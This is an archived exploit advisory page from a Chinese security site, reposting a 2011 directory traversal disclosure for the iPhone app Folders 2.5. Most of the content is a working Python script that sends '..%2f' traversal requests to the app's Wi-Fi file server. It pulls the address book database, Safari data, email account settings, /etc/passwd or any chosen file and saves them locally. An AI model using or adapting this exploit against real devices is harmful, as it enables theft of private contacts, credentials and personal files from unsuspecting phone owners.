首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iPhone Folders 2.5 Directory Traversal
来源:Http://IRCRASH.COM 作者:IRCRASH 发布时间:2011-02-28  

----------------------------------------------------------------
Software : iPhone Folders 2.5
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://itunes.apple.com/app/folders-private-file-storage/id287950258?mt=8
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

Exploit:

#!/usr/bin/python
import urllib2
def urlread(url,file):
 url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
 u = urllib2.urlopen(url)
 localFile = open('result.html', 'w')
 localFile.write(u.read())
 localFile.close()
 print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone Folders 2.5 DT                 -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
 url='http://'+url
if ((id>0) and (id<6)):
 file=f[id]
 urlread(url,file)
if (id==6):
 file=raw_input("Enter Local File Address : ")
 urlread(url,file)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Edraw Office Viewer Component
·iPhone iFile 2.0 Directory Tra
·iPhone MyDocs 2.7 Directory Tr
·Joomla XCloner Component (com_
·iPhone PDF Reader Pro 2.3 Dire
·eXPert PDF Reader 4.0 NULL Poi
·iPhone Guitar Directory Traver
·Elecard AVC_HD/MPEG Player 5.7
·iPhone ishred 1.93 Directory T
·Refractor 2 Engine NULL Pointe
·Elecard MPEG Player 5.7 Local
·JetAudio Skins 5.1.5.2 Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved